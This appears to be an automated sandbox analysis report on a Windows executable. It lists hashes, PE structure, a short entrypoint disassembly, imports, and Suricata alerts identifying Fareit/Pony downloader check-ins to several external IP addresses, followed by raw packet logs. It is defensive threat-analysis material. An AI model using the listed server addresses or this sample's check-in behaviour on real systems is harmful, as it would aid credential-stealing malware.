SSDEEP:	3072:eps58pvoY9pm4arHiETYPTP3vfdHldhwE3vfdHldhwVOpvoY9FpvoY9jmJm4arq3:UW8Zr9U4nE49Zr9FZr9q04BnEASEg
TLSH:	D1841956B254298AF5EE0A7098A6C610D667FE191838807CA1BBF33D57732465F33B0F
File Content Preview:	MZ......................@...............................................!..L."This program cannot be run in DOS mode....$........./.B.A.B.A.B.A...N.@.A...!.C.A.....U.A.B.@...A.....^.A.....C.A.....C.A.RichB.A.........PE..L....2.=.................@.........

File Icon


Icon Hash:	1b9c988b9bab879b

Static PE Info

General

Entrypoint:	0x4024f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x3D8732AF [Tue Sep 17 13:48:31 2002 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	547d55964e9333c3057788d5c4e8169f

Entrypoint Preview

Instruction
xor edx, edx
push dword ptr [esp+10h]
call 00007FD7888C75FFh
pop ecx
jmp dword ptr [004150C0h]
int3
int3
int3
mov ecx, 00402513h
add dword ptr [004150C0h], ecx
retn 0004h
push ebp
mov ebp, esp
sub esp, 14h
mov dword ptr [ebp-0Ch], DCF9755Ch
mov dword ptr [ebp-14h], 00000000h
mov dword ptr [ebp-08h], 00000000h
call 00007FD7888C74F7h
call 00007FD7888C7329h
mov dword ptr [ebp-10h], eax
cmp eax, 00000000h
je 00007FD7888C75F4h
jmp 00007FD7888C762Fh
push dword ptr [ebp-14h]
push dword ptr [ebp-14h]
xor dword ptr [ebp-04h], 9D44E85Bh
push dword ptr [ebp-14h]
push dword ptr [ebp-14h]
lea edx, dword ptr [ebp+08h]
sub edx, 10h
push edx
call 00007FD7888C6F14h
add esp, 14h
xor dword ptr [ebp-04h], CD379C60h
cmp dword ptr [ebp-0Ch], DCF9755Ch
je 00007FD7888C75F2h
or byte ptr [ebp-04h], FFFFFFA6h
mov byte ptr [00415400h], 00000001h
mov esp, ebp
pop ebp
ret
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000088h
mov dword ptr [ebp-60h], 00000004h
mov dword ptr [ebp-10h], 00000000h
mov dword ptr [ebp-0Ch], 00000200h
mov dword ptr [ebp-6Ch], 9F74708Ch
mov dword ptr [ebp-5Ch], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x140d0	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0xd214	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1100	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xf4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13630	0x14000	d6c60e57d664ab578edc0f8c5bf49999	False	0.760107421875	data	6.970578891686763	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x15000	0x50400	0x1000	85fd98acc87085326611bb7bc32bdd99	False	0.034912109375	data	0.3703270049920998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x66000	0xd214	0xe000	50509186ad1a51c03bebb2b7840a78f9	False	0.12958635602678573	data	4.318848328541793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x66370	0x1d0	Device independent bitmap graphic, 48 x 15 x 4, image size 360	English	United States	0.5387931034482759
RT_BITMAP	0x66540	0x3560	Device independent bitmap graphic, 118 x 226 x 4, image size 0	English	United States	0.10187353629976581
RT_BITMAP	0x69aa0	0x3560	Device independent bitmap graphic, 118 x 226 x 4, image size 0	English	United States	0.10889929742388758
RT_ICON	0x6d000	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.2008298755186722
RT_ICON	0x6f5a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.2008298755186722
RT_DIALOG	0x71b50	0x23a	data	English	United States	0.5017543859649123
RT_DIALOG	0x71d8c	0x1f4	data	English	United States	0.55
RT_DIALOG	0x71f80	0x114	data	English	United States	0.6884057971014492
RT_STRING	0x72094	0x44c	data	English	United States	0.3972727272727273
RT_STRING	0x724e0	0x356	data	English	United States	0.4203747072599532
RT_STRING	0x72838	0x548	data	English	United States	0.34763313609467456
RT_STRING	0x72d80	0x104	data	English	United States	0.5461538461538461
RT_STRING	0x72e84	0x52	data	English	United States	0.6341463414634146
RT_GROUP_ICON	0x72ed8	0x22	data	English	United States	1.0
RT_VERSION	0x72efc	0x318	data	English	United States	0.43434343434343436

Imports

DLL

Import

KERNEL32.dll

LockFile, SetStdHandle, GetLocaleInfoW, FlushFileBuffers, GetSystemInfo, VirtualProtect, LCMapStringW, LCMapStringA, VirtualQuery, RtlUnwind, HeapReAlloc, GetOEMCP, GetACP, LoadLibraryA, GetStringTypeW, GetStringTypeA, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, Sleep, GetCPInfo, HeapCreate, HeapDestroy, GetStartupInfoA, GetFileType, SetHandleCount, GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, WriteFile, MultiByteToWideChar, GetLastError, GetModuleHandleA, GetProcAddress, ExitProcess, GetProcessHeap, HeapAlloc, GetVersionExA, HeapFree, GetCommandLineA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, FormatMessageA, LocalFree, GetDiskFreeSpaceA, lstrlenA

msvcrt.dll

puts

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-07T18:27:00.133063+0100	2014234	ET MALWARE Fareit/Pony Downloader Checkin 3	1	192.168.2.4	49881	188.114.97.6	443	TCP
2024-12-07T18:27:00.133063+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49881	188.114.97.6	443	TCP
2024-12-07T18:27:00.133063+0100	2014234	ET MALWARE Fareit/Pony Downloader Checkin 3	1	192.168.2.4	49883	72.32.185.12	80	TCP
2024-12-07T18:27:00.133063+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49883	72.32.185.12	80	TCP
2024-12-07T18:27:01.150098+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:01.150098+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:01.150098+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:02.190465+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:08.478817+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:14.803645+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:21.096865+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:27.401407+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:33.699253+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:39.995146+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:46.290157+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:52.574602+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:27:59.848503+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49758	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49758	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49758	208.91.197.44	80	TCP
2024-12-07T18:28:06.161576+0100	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49758	208.91.197.44	80	TCP
2024-12-07T18:28:59.594886+0100	2014234	ET MALWARE Fareit/Pony Downloader Checkin 3	1	192.168.2.4	49877	104.21.17.37	80	TCP
2024-12-07T18:28:59.594886+0100	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49877	104.21.17.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 7, 2024 18:27:00.909964085 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:01.029491901 CET	80	49730	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:01.029613018 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:01.030493021 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:01.150016069 CET	80	49730	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:01.150098085 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:01.269607067 CET	80	49730	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:02.190289974 CET	80	49730	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:02.190464973 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:02.190599918 CET	49730	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:02.310301065 CET	80	49730	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:07.198765993 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:07.318639040 CET	80	49731	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:07.318722010 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:07.318893909 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:07.438806057 CET	80	49731	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:07.438896894 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:07.558465958 CET	80	49731	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:08.478754997 CET	80	49731	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:08.478816986 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:08.478912115 CET	49731	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:08.598879099 CET	80	49731	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:13.495556116 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:13.615217924 CET	80	49732	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:13.615376949 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:13.615461111 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:13.734977007 CET	80	49732	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:13.735074043 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:13.854747057 CET	80	49732	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:14.803591013 CET	80	49732	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:14.803644896 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:14.803756952 CET	49732	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:14.923230886 CET	80	49732	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:19.807995081 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:19.927553892 CET	80	49736	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:19.927668095 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:19.927830935 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:20.047256947 CET	80	49736	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:20.047744989 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:20.167200089 CET	80	49736	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:21.086838961 CET	80	49736	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:21.096864939 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:21.097048998 CET	49736	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:21.216639042 CET	80	49736	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:26.120819092 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:26.240380049 CET	80	49740	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:26.240518093 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:26.240622997 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:26.360053062 CET	80	49740	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:26.360110044 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:26.479588985 CET	80	49740	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:27.401308060 CET	80	49740	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:27.401407003 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:27.401532888 CET	49740	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:27.521068096 CET	80	49740	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:32.417776108 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:32.538470984 CET	80	49741	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:32.538594961 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:32.538707018 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:32.658153057 CET	80	49741	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:32.658251047 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:32.778788090 CET	80	49741	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:33.699172974 CET	80	49741	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:33.699253082 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:33.700380087 CET	49741	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:33.819854021 CET	80	49741	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:38.714564085 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:38.834172964 CET	80	49742	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:38.834325075 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:38.834505081 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:38.955198050 CET	80	49742	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:38.955339909 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:39.075028896 CET	80	49742	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:39.995014906 CET	80	49742	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:39.995146036 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:39.995268106 CET	49742	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:40.114713907 CET	80	49742	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:45.011452913 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:45.131007910 CET	80	49743	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:45.131103039 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:45.131195068 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:45.250638962 CET	80	49743	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:45.250772953 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:45.371148109 CET	80	49743	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:46.290062904 CET	80	49743	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:46.290157080 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:46.290287018 CET	49743	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:46.410034895 CET	80	49743	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:51.292614937 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:51.412484884 CET	80	49744	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:51.412590981 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:51.412682056 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:51.533615112 CET	80	49744	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:51.533770084 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:51.653398991 CET	80	49744	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:52.574502945 CET	80	49744	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:52.574601889 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:52.579408884 CET	49744	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:52.702415943 CET	80	49744	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:57.589582920 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:58.192871094 CET	80	49746	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:58.192954063 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:58.193068981 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:58.806994915 CET	80	49746	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:58.807048082 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:59.432465076 CET	80	49746	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:59.848325014 CET	80	49746	208.91.197.44	192.168.2.4
Dec 7, 2024 18:27:59.848503113 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:59.848643064 CET	49746	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:27:59.968116045 CET	80	49746	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:04.855340004 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:04.974968910 CET	80	49758	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:04.977967978 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:04.978049994 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:05.098107100 CET	80	49758	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:05.098192930 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:05.217858076 CET	80	49758	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:06.161494017 CET	80	49758	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:06.161576033 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:06.161701918 CET	49758	80	192.168.2.4	208.91.197.44
Dec 7, 2024 18:28:06.281281948 CET	80	49758	208.91.197.44	192.168.2.4
Dec 7, 2024 18:28:58.346904039 CET	49877	80	192.168.2.4	104.21.17.37
Dec 7, 2024 18:28:58.466878891 CET	80	49877	104.21.17.37	192.168.2.4
Dec 7, 2024 18:28:58.466964006 CET	49877	80	192.168.2.4	104.21.17.37
Dec 7, 2024 18:28:58.467014074 CET	49877	80	192.168.2.4	104.21.17.37
Dec 7, 2024 18:28:58.586818933 CET	80	49877	104.21.17.37	192.168.2.4
Dec 7, 2024 18:28:59.592813969 CET	80	49877	104.21.17.37	192.168.2.4
Dec 7, 2024 18:28:59.594814062 CET	80	49877	104.21.17.37	192.168.2.4
Dec 7, 2024 18:28:59.594886065 CET	49877	80	192.168.2.4	104.21.17.37
Dec 7, 2024 18:28:59.610126972 CET	49877	80	192.168.2.4	104.21.17.37
Dec 7, 2024 18:28:59.729782104 CET	80	49877	104.21.17.37	192.168.2.4
Dec 7, 2024 18:28:59.933909893 CET	49881	443	192.168.2.4	188.114.97.6
Dec 7, 2024 18:28:59.933952093 CET	443	49881	188.114.97.6	192.168.2.4
Dec 7, 2024 18:28:59.934025049 CET	49881	443	192.168.2.4	188.114.97.6
Dec 7, 2024 18:28:59.934055090 CET	49881	443	192.168.2.4	188.114.97.6
Dec 7, 2024 18:28:59.934068918 CET	443	49881	188.114.97.6	192.168.2.4
Dec 7, 2024 18:28:59.934176922 CET	443	49881	188.114.97.6	192.168.2.4
Dec 7, 2024 18:29:00.351176977 CET	49883	80	192.168.2.4	72.32.185.12
Dec 7, 2024 18:29:00.470777035 CET	80	49883	72.32.185.12	192.168.2.4
Dec 7, 2024 18:29:00.470860004 CET	49883	80	192.168.2.4	72.32.185.12
Dec 7, 2024 18:29:00.470936060 CET	49883	80	192.168.2.4	72.32.185.12
Dec 7, 2024 18:29:00.644046068 CET	80	49883	72.32.185.12	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 7, 2024 18:27:00.133063078 CET	59541	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:27:00.874520063 CET	53	59541	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:06.162389040 CET	61326	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:06.506531954 CET	53	61326	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:11.511539936 CET	56863	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:11.652014017 CET	53	56863	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:16.667769909 CET	59716	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:16.806974888 CET	53	59716	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:21.823880911 CET	55326	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:21.961507082 CET	53	55326	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:26.980133057 CET	50264	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:27.119568110 CET	53	50264	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:32.137064934 CET	53019	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:32.277067900 CET	53	53019	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:37.292529106 CET	56996	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:37.436367989 CET	53	56996	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:42.449079037 CET	53221	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:42.586261034 CET	53	53221	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:47.589751959 CET	63387	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:47.730521917 CET	53	63387	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:52.745841026 CET	63097	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:52.883682966 CET	53	63097	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:57.886420965 CET	50435	53	192.168.2.4	1.1.1.1
Dec 7, 2024 18:28:58.024211884 CET	53	50435	1.1.1.1	192.168.2.4
Dec 7, 2024 18:28:58.025098085 CET	58402	53	192.168.2.4	1.1.1.1
